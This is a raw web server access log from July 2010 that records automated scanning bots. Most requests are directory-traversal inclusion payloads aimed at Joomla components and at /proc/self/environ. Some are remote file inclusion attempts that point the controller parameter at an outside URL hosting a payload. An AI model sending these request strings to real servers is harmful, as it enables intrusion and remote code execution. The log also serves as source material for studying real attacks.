209.40.100.50 - - [05/Jul/2010:03:48:33 -0500] "GET /logs/access_log.1277424000//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
209.40.100.50 - - [05/Jul/2010:03:48:33 -0500] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
209.40.100.50 - - [05/Jul/2010:03:48:33 -0500] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
209.40.100.50 - - [05/Jul/2010:03:49:04 -0500] "GET /logs/access_log.1276732800//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
209.40.100.50 - - [05/Jul/2010:03:49:06 -0500] "GET /logs/access_log.1276732800//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
209.61.244.6 - - [05/Jul/2010:03:49:22 -0500] "GET /logs/access_log.1277164800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.76"
209.61.244.6 - - [05/Jul/2010:03:49:23 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.76"
209.61.244.6 - - [05/Jul/2010:03:49:23 -0500] "GET /logs/access_log.1277164800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.76"
209.61.244.6 - - [05/Jul/2010:03:49:24 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.76"
209.61.244.6 - - [05/Jul/2010:03:49:24 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.76"
209.61.244.6 - - [05/Jul/2010:03:49:25 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.76"
78.41.233.128 - - [05/Jul/2010:03:51:56 -0500] "GET //index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
209.40.100.50 - - [05/Jul/2010:03:52:00 -0500] "GET /logs/access_log.1276732800//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
209.40.100.50 - - [05/Jul/2010:03:52:00 -0500] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
209.40.100.50 - - [05/Jul/2010:03:52:00 -0500] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
78.41.233.128 - - [05/Jul/2010:03:52:04 -0500] "GET //index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
78.41.233.128 - - [05/Jul/2010:03:52:32 -0500] "GET /logs/access_log.1276819200//index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
78.41.233.128 - - [05/Jul/2010:03:52:33 -0500] "GET //index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
78.41.233.128 - - [05/Jul/2010:03:52:33 -0500] "GET /logs//index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
78.41.233.128 - - [05/Jul/2010:03:53:00 -0500] "GET /logs/access_log.1276128000//index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
78.41.233.128 - - [05/Jul/2010:03:53:00 -0500] "GET //index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
78.41.233.128 - - [05/Jul/2010:03:53:00 -0500] "GET /logs//index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
78.41.233.128 - - [05/Jul/2010:03:53:11 -0500] "GET /logs/access_log.1276732800//index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
78.41.233.128 - - [05/Jul/2010:03:53:21 -0500] "GET //index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
209.40.100.50 - - [05/Jul/2010:03:53:28 -0500] "GET /logs/access_log.1276905600//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
78.41.233.128 - - [05/Jul/2010:03:54:10 -0500] "GET //index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
96.30.21.84 - - [05/Jul/2010:03:54:58 -0500] "GET /logs/access_log.1277164800//index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
96.30.21.84 - - [05/Jul/2010:03:54:58 -0500] "GET //index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
96.30.21.84 - - [05/Jul/2010:03:54:58 -0500] "GET /logs//index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
92.60.176.46 - - [05/Jul/2010:03:55:08 -0500] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 12135 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:03:55:09 -0500] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:03:55:11 -0500] "GET /logs/access_log.1276819200%20%20/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 313 "-""MaMa CaSpEr"
78.41.233.128 - - [05/Jul/2010:03:55:51 -0500] "GET /logs/access_log.1276732800//index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
78.41.233.128 - - [05/Jul/2010:03:55:51 -0500] "GET //index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
78.41.233.128 - - [05/Jul/2010:03:55:51 -0500] "GET /logs//index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
66.40.65.160 - - [05/Jul/2010:03:55:53 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
209.61.244.6 - - [05/Jul/2010:03:55:54 -0500] "GET /logs/access_log.1277164800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.76"
209.61.244.6 - - [05/Jul/2010:03:55:56 -0500] "GET /logs/access_log.1277164800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.76"
66.40.65.160 - - [05/Jul/2010:03:55:59 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
209.61.244.6 - - [05/Jul/2010:03:55:59 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.76"
209.61.244.6 - - [05/Jul/2010:03:56:01 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.76"
209.61.244.6 - - [05/Jul/2010:03:56:05 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.76"
209.61.244.6 - - [05/Jul/2010:03:56:06 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.76"
78.41.233.128 - - [05/Jul/2010:03:56:18 -0500] "GET //index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
92.60.176.46 - - [05/Jul/2010:03:56:42 -0500] "GET /logs/access_log.1277251200%20%20/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 313 "-""MaMa CaSpEr"
66.40.65.160 - - [05/Jul/2010:03:56:51 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
193.193.128.71 - - [05/Jul/2010:03:56:54 -0500] "GET /logs/access_log.1274572800//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
193.193.128.71 - - [05/Jul/2010:03:56:54 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
193.193.128.71 - - [05/Jul/2010:03:56:55 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
193.193.128.71 - - [05/Jul/2010:03:56:56 -0500] "GET /logs/access_log.1276128000//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
66.40.65.160 - - [05/Jul/2010:03:58:48 -0500] "GET /logs/access_log.1275091200//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
66.40.65.160 - - [05/Jul/2010:03:58:49 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
66.40.65.160 - - [05/Jul/2010:03:58:49 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
66.40.65.160 - - [05/Jul/2010:03:58:49 -0500] "GET /logs/access_log.1277424000//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
78.41.233.128 - - [05/Jul/2010:03:59:01 -0500] "GET /logs/access_log.1276905600//index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
78.41.233.128 - - [05/Jul/2010:03:59:01 -0500] "GET //index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
78.41.233.128 - - [05/Jul/2010:03:59:01 -0500] "GET /logs//index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
78.41.233.128 - - [05/Jul/2010:03:59:05 -0500] "GET /logs/access_log.1276214400//index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
66.40.65.160 - - [05/Jul/2010:03:59:20 -0500] "GET /logs/access_log.1275091200//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
66.40.65.160 - - [05/Jul/2010:03:59:20 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
66.40.65.160 - - [05/Jul/2010:03:59:21 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
66.40.65.160 - - [05/Jul/2010:03:59:21 -0500] "GET /logs/access_log.1277424000//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
209.61.244.6 - - [05/Jul/2010:03:59:40 -0500] "GET /logs/access_log.1277251200//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.76"
209.61.244.6 - - [05/Jul/2010:03:59:40 -0500] "GET /logs/access_log.1277251200//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.76"
77.221.145.35 - - [05/Jul/2010:04:00:05 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:00:05 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:00:05 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:00:06 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:00:06 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:00:06 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:00:06 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:00:06 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:00:06 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:00:07 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:00:07 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:00:07 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:00:07 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:00:07 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:00:07 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:00:08 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:00:08 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:00:08 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:00:08 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:00:08 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:00:08 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""MaMa CaSpEr"
193.193.128.71 - - [05/Jul/2010:04:00:58 -0500] "GET /logs/access_log.1276300800//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
193.193.128.71 - - [05/Jul/2010:04:00:58 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
193.193.128.71 - - [05/Jul/2010:04:00:59 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
217.172.16.70 - - [05/Jul/2010:04:01:16 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
217.172.16.70 - - [05/Jul/2010:04:01:16 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
217.172.16.70 - - [05/Jul/2010:04:01:17 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
217.172.16.70 - - [05/Jul/2010:04:01:17 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
217.172.16.70 - - [05/Jul/2010:04:01:17 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
217.172.16.70 - - [05/Jul/2010:04:01:17 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
217.172.16.70 - - [05/Jul/2010:04:01:18 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
217.172.16.70 - - [05/Jul/2010:04:01:18 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
217.172.16.70 - - [05/Jul/2010:04:01:19 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
217.172.16.70 - - [05/Jul/2010:04:01:19 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
193.193.128.71 - - [05/Jul/2010:04:01:19 -0500] "GET /logs/access_log.1276819200//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
217.172.16.70 - - [05/Jul/2010:04:01:19 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
217.172.16.70 - - [05/Jul/2010:04:01:19 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
217.172.16.70 - - [05/Jul/2010:04:01:20 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
217.172.16.70 - - [05/Jul/2010:04:01:20 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
217.172.16.70 - - [05/Jul/2010:04:01:20 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
217.172.16.70 - - [05/Jul/2010:04:01:20 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
217.172.16.70 - - [05/Jul/2010:04:01:21 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
217.172.16.70 - - [05/Jul/2010:04:01:21 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
66.40.65.160 - - [05/Jul/2010:04:01:32 -0500] "GET /logs/access_log.1275091200//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
66.40.65.160 - - [05/Jul/2010:04:01:32 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
66.40.65.160 - - [05/Jul/2010:04:01:32 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
66.40.65.160 - - [05/Jul/2010:04:01:40 -0500] "GET /logs/access_log.1275091200//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
66.40.65.160 - - [05/Jul/2010:04:01:41 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
66.40.65.160 - - [05/Jul/2010:04:01:41 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
66.40.65.160 - - [05/Jul/2010:04:01:42 -0500] "GET /logs/access_log.1275091200//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
66.40.65.160 - - [05/Jul/2010:04:01:42 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
66.40.65.160 - - [05/Jul/2010:04:01:42 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
66.40.65.160 - - [05/Jul/2010:04:01:43 -0500] "GET /logs/access_log.1275609600//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
66.40.65.160 - - [05/Jul/2010:04:01:53 -0500] "GET /logs/access_log.1275609600//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
66.40.65.160 - - [05/Jul/2010:04:01:54 -0500] "GET /logs/access_log.1275609600//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
78.41.233.128 - - [05/Jul/2010:04:02:31 -0500] "GET /logs/access_log.1276905600//index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
78.41.233.128 - - [05/Jul/2010:04:02:31 -0500] "GET //index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
78.41.233.128 - - [05/Jul/2010:04:02:31 -0500] "GET /logs//index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
66.40.65.160 - - [05/Jul/2010:04:02:48 -0500] "GET /logs/access_log.1276905600//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
66.40.65.160 - - [05/Jul/2010:04:02:48 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
66.40.65.160 - - [05/Jul/2010:04:02:48 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
66.40.65.160 - - [05/Jul/2010:04:02:48 -0500] "GET /logs/access_log.1275091200//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
78.41.233.128 - - [05/Jul/2010:04:04:02 -0500] "GET /logs/access_log.1276214400//index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
193.193.128.71 - - [05/Jul/2010:04:04:41 -0500] "GET /logs/access_log.1277078400//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
193.193.128.71 - - [05/Jul/2010:04:04:41 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
193.193.128.71 - - [05/Jul/2010:04:04:42 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
193.193.128.71 - - [05/Jul/2010:04:05:21 -0500] "GET /logs/access_log.1275264000//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
92.60.176.46 - - [05/Jul/2010:04:06:50 -0500] "GET /lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 298 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:04:06:50 -0500] "GET /logs/lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 303 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:04:06:50 -0500] "GET /logs/access_log.1276732800/lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 325 "-""MaMa CaSpEr"
209.61.244.6 - - [05/Jul/2010:04:07:01 -0500] "GET /logs/access_log.1274572800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.76"
209.61.244.6 - - [05/Jul/2010:04:07:01 -0500] "GET /logs/access_log.1274572800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.76"
209.61.244.6 - - [05/Jul/2010:04:07:03 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.76"
209.61.244.6 - - [05/Jul/2010:04:07:03 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.76"
209.61.244.6 - - [05/Jul/2010:04:07:04 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.76"
209.61.244.6 - - [05/Jul/2010:04:07:04 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.76"
209.61.244.6 - - [05/Jul/2010:04:07:13 -0500] "GET /logs/access_log.1277424000//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.76"
209.61.244.6 - - [05/Jul/2010:04:07:13 -0500] "GET /logs/access_log.1277424000//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.76"
77.221.145.35 - - [05/Jul/2010:04:07:36 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:07:37 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:07:38 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:07:39 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:07:40 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:07:40 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:07:41 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""MaMa CaSpEr"
77.221.145.35 - - [05/Jul/2010:04:07:42 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""MaMa CaSpEr"
